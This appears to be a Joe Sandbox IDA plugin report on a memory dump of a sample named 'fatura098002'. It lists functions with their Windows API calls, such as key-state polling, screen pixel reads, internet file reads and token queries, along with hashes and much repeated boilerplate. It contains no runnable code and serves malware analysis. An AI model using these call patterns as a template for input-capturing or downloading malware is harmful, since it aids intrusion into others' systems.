Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 742344f3f9491bf2297a6d15da8802fcfd03ba7cf343d2f364f1670bc96209d5
Instruction ID: 386ac456419f550083c8f96c188c07b722946528268a34c4a79d107658b95568
Opcode Fuzzy Hash: 742344f3f9491bf2297a6d15da8802fcfd03ba7cf343d2f364f1670bc96209d5
Instruction Fuzzy Hash: 4D410235A00104AFDF25DF28DC58FA97BA5EB0A350F154369F899A72E0D379FD41CA60

Function 00732051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007320C3
_free.LIBCMT ref: 007320E3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0b7ad391a4df5700f78102daf36d38b50a449235a60f21527d2679f9e34d4b9c
Instruction ID: ee61e565445b6ce8f33f9b46c9b7991c1f7aca6de9e4fada49d25c48b08dd36d
Opcode Fuzzy Hash: 0b7ad391a4df5700f78102daf36d38b50a449235a60f21527d2679f9e34d4b9c
Instruction Fuzzy Hash: A441E232A00214EFDB24DF78C984A5EB3B5EF88710F1545A8E515EB393EA35AD02CB80

Function 0071912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00719141
ScreenToClient.USER32(00000000,?), ref: 0071915E
GetAsyncKeyState.USER32(00000001), ref: 00719183
GetAsyncKeyState.USER32(00000002), ref: 0071919D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 6bea71714354e5a85838bb350dbc0b04af2c5dd0bd179684f37fa7ba0f57e159
Instruction ID: 13037d6d5f78c8aab60e537b70a0dd6137457f0badf3cf6f9fde98bc9879239c
Opcode Fuzzy Hash: 6bea71714354e5a85838bb350dbc0b04af2c5dd0bd179684f37fa7ba0f57e159
Instruction Fuzzy Hash: 3641903190850AFBDF099F68D858BEEB774FB45320F208215E925A32D0C7786D95DB51

Function 00773874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 007738CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00773922
TranslateMessage.USER32(?), ref: 0077394B
DispatchMessageW.USER32(?), ref: 00773955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00773966

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: f3b86bc1ff9e4f186e4078c288fc32a4153040c051dc35d856db0d1f7b9903d5
Instruction ID: a1f7229ab3397f84c5af050531f318084c801bfa558bd877ac24d9756aad5649
Opcode Fuzzy Hash: f3b86bc1ff9e4f186e4078c288fc32a4153040c051dc35d856db0d1f7b9903d5
Instruction Fuzzy Hash: 0531C870505341AEEF25CB749848BB637B4AB05388F44C56AD56A82190D3BCB685EF25

Function 0077CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0077CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFF2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: a2bd87779ca1a2e941058be64ead5788e89551c7c3346f7b57e7cf96dafcae14
Instruction ID: 75b1abe5a69bf2587a15bfc7b923acd7882b3dcc692cf74227f5dd50c41f0035
Opcode Fuzzy Hash: a2bd87779ca1a2e941058be64ead5788e89551c7c3346f7b57e7cf96dafcae14
Instruction Fuzzy Hash: F1315072600605EFDF21DFA5D8849ABBBF9EF18390B10842EF50AD2141D738AE41DB60

Function 00761901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00761915
PostMessageW.USER32(00000001,00000201,00000001), ref: 007619C1
Sleep.KERNEL32(00000000,?,?,?), ref: 007619C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 007619DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 007619E2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bd84d1b9125daa27d84241b33a4ed7abafcd7cba5a5930f97f56931b58cb05c3
Instruction ID: 5279f8906151d7d9ad0e534f90edd0595dff31f2d542e0e288ae89edd62558ec
Opcode Fuzzy Hash: bd84d1b9125daa27d84241b33a4ed7abafcd7cba5a5930f97f56931b58cb05c3
Instruction Fuzzy Hash: 6731AD71A00259EFCB00CFA8C99DADE3BB5EB04315F548269FD22A72D1C774AD44CB90

Function 00795706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00795745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0079579D
_wcslen.LIBCMT ref: 007957AF
_wcslen.LIBCMT ref: 007957BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00795816

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 6c2c09e6c0a549a87120d67ceda06302ba1d619d1f69f619d96b848b7d923771
Instruction ID: add33c7ea94da819aeeecdf907d179e4338128d1d194a7864bad4d8a9ed9a634
Opcode Fuzzy Hash: 6c2c09e6c0a549a87120d67ceda06302ba1d619d1f69f619d96b848b7d923771
Instruction Fuzzy Hash: 2B21A771904628EADF21CFA0EC44EED7778FF04720F108156E929DA191D7789A85CF50

Function 00780930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00780951
GetForegroundWindow.USER32 ref: 00780968
GetDC.USER32(00000000), ref: 007809A4
GetPixel.GDI32(00000000,?,00000003), ref: 007809B0
ReleaseDC.USER32(00000000,00000003), ref: 007809E8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 73ec962ef4a7aac11d92d5bb95ae60a78e0b74869c0c01b89d55c9de8f31ee9c
Instruction ID: f2e4edb95af20e7f85891a9c3f94ae7b52f556ca58356704dcc23a3eb4a1a558
Opcode Fuzzy Hash: 73ec962ef4a7aac11d92d5bb95ae60a78e0b74869c0c01b89d55c9de8f31ee9c
Instruction Fuzzy Hash: 6921A435600204EFDB14EF68C848A6EB7E5EF48740F04C169F84A97352DB78AC04CB90

Function 0073CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0073CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0073CDE9

Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444), ref: 00733852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0073CE0F
_free.LIBCMT ref: 0073CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0073CE31

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0c79aa988cd2e32ef1d70c7fc41ca1951bf4107d38fb8c91ab823a3e48dce3c7
Instruction ID: 41105f155676e901e45b90a7001d598dd8633087503a742d50a5472cbd714c34
Opcode Fuzzy Hash: 0c79aa988cd2e32ef1d70c7fc41ca1951bf4107d38fb8c91ab823a3e48dce3c7
Instruction Fuzzy Hash: D90147726412187F372326B66C8CC7B796CDEC2BA0B14412EFD00E3203EA2D8D0283B4

Function 00719639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
SelectObject.GDI32(?,00000000), ref: 007196A2
BeginPath.GDI32(?), ref: 007196B9
SelectObject.GDI32(?,00000000), ref: 007196E2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 53a52104ba5152592aefadacdcdde5e6133aa6e9d6caf65e514a15a4fcb58e4e
Instruction ID: 94282ae09931a7b78768852e37ffd2cbcd489fcf31074e99a3accc38a428c884
Opcode Fuzzy Hash: 53a52104ba5152592aefadacdcdde5e6133aa6e9d6caf65e514a15a4fcb58e4e
Instruction Fuzzy Hash: 5E217170802345FBDB119F68EC247E93B74BB00355F508217F550A61F1D37C6896CBA8

Function 00765711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00765726
_memcmp.LIBVCRUNTIME ref: 00765744
_memcmp.LIBVCRUNTIME ref: 00765757
_memcmp.LIBVCRUNTIME ref: 0076576F
_memcmp.LIBVCRUNTIME ref: 00765787

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 880777db47845f187e0667c44965e227bac0823fede5291838a2dd94b4a199ae
Instruction ID: 6fc6a374786a4fb0526a81a6145455ec444ca43f382f292fda0fcd4001681ed5
Opcode Fuzzy Hash: 880777db47845f187e0667c44965e227bac0823fede5291838a2dd94b4a199ae
Instruction Fuzzy Hash: 5B01B9A1641615FBD6089520ED42FBB735DAB313A4F404020FD06AA641F76DEE20A2F0

Function 00732DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6), ref: 00732DFD
_free.LIBCMT ref: 00732E32
_free.LIBCMT ref: 00732E59
SetLastError.KERNEL32(00000000,00701129), ref: 00732E66
SetLastError.KERNEL32(00000000,00701129), ref: 00732E6F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 39765bb99102564867d435ac320481a388ad50afc0b3fb93ddd269741d1bbbfe
Instruction ID: 3e12cde1ddf6635fcc520cd89c55feeac8a7cf6f2adcf7ef6aa4170ee97c99f0
Opcode Fuzzy Hash: 39765bb99102564867d435ac320481a388ad50afc0b3fb93ddd269741d1bbbfe
Instruction Fuzzy Hash: 8C012872285600ABFA1327757C4FE2B266DABC17B1F258029F425A22E3EF7C8C035065

Function 0076000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 0076002B
ProgIDFromCLSID.COMBASE(?,00000000), ref: 00760046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760054
CoTaskMemFree.COMBASE(00000000), ref: 00760064
CLSIDFromString.COMBASE(?,?), ref: 00760070

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: f8d967573dbd411d6f2460bf3feb08289718ace8e3e87478a0f0bd7602a2b5cb
Instruction ID: bcb9213488dffaeb946ec3f57ec8785896d1c3ce6e7323cd55144906ea090423
Opcode Fuzzy Hash: f8d967573dbd411d6f2460bf3feb08289718ace8e3e87478a0f0bd7602a2b5cb
Instruction Fuzzy Hash: 2B018B76600204BFDF124F68DC08FAB7AADEB447A2F148125FD06E6210E7B9DD419BA0

Function 0076E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0076E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0076E9A5
Sleep.KERNEL32(00000000), ref: 0076E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0076E9B7
Sleep.KERNEL32 ref: 0076E9F3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 39ea12dd3f14ecf5d53e2e1389725d5c11cb66300b4fd8d80b84afb80cf714ad
Instruction ID: 1b57157041e44960103b6b35420731a5bbd2ec99b151f78b887a4aeb68879735
Opcode Fuzzy Hash: 39ea12dd3f14ecf5d53e2e1389725d5c11cb66300b4fd8d80b84afb80cf714ad
Instruction Fuzzy Hash: A5018C75C0162DDBCF00AFE4DC59AEDBB78FF08700F444546E902B2241DB38A552CBAA

Function 007610F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00761136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 851cd19fea3fef4779da23a435afc2c0e0391966b93525844863d52fbaff84cb
Instruction ID: 26c73b8724a671c7e43464384a0efd8558a5d8aa0008ce0d119aefb44f8a4b15
Opcode Fuzzy Hash: 851cd19fea3fef4779da23a435afc2c0e0391966b93525844863d52fbaff84cb
Instruction Fuzzy Hash: A4016DB5100209BFDF164FA8DC4DA6A3B6EEF86360B548416FA41C3360DA35DC018A64

Function 00760FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00760FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00760FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00760FE5
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00760FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00761002

Memory Dump Source

